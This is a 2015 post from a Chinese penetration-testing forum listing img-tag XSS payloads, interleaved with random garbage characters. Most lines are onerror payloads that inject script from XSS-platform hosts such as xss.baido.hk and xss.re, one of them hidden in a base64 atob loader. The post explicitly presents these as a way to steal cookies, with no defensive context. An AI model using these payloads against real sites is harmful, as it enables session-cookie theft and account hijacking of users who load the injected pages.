中国网络渗透测试联盟

标题: img标签的常用几种测试手段 [打印本页]

作者: admin    时间: 2015-10-18 14:33
标题: img标签的常用几种测试手段
<img src='non-exist.jpg'onerror="alert('xss')">2 I; m7 g+ c- _
<img src=# onerror=alert(123)>: E' Z3 M! x8 o+ L* V$ A0 R
<img src=# onerror=alert(document.cookie)>
3 k* G  c5 N& P+ @" |. s下面是利用平台钓cookie的
9 a  f+ ], M- f6 S) S <img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
, X5 r8 C% u7 Q* N0 y. H9 |8 Y  w( {; J- c

  Z3 n* f; b+ A, |9 k( ?) P/ D<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>! G4 _! ?& B' V1 [0 B
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>. l0 x7 n8 n: E0 `* ]
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
( n) q: N) J) ^2 g<img src=1 onerror=jQuery.getScript("//xss.re/974")> - Z; v+ H" h3 x- V6 A
<img src="#">& ]- e- ~; ^, I& p
<img src="#">
- I5 X4 R+ G6 c5 X  P7 `& u. J<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>8 V% S2 l( X2 u% a6 [8 C
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
8 `8 ^6 L7 K5 |& m<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
' M) p- a( v& [6 ^! X% {6 ~<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
. K2 U) E) f- I9 w<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>4 A5 o4 T: [, m2 F* [5 K1 i% z
<img src=x width="0" height="0"></img>
* M6 U, |- }! b8 F$ a5 B$ B7 |5 T<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>1 V6 d- v0 j/ W% c) Q( m6 P
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
) B5 W' e6 o$ L/ l




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2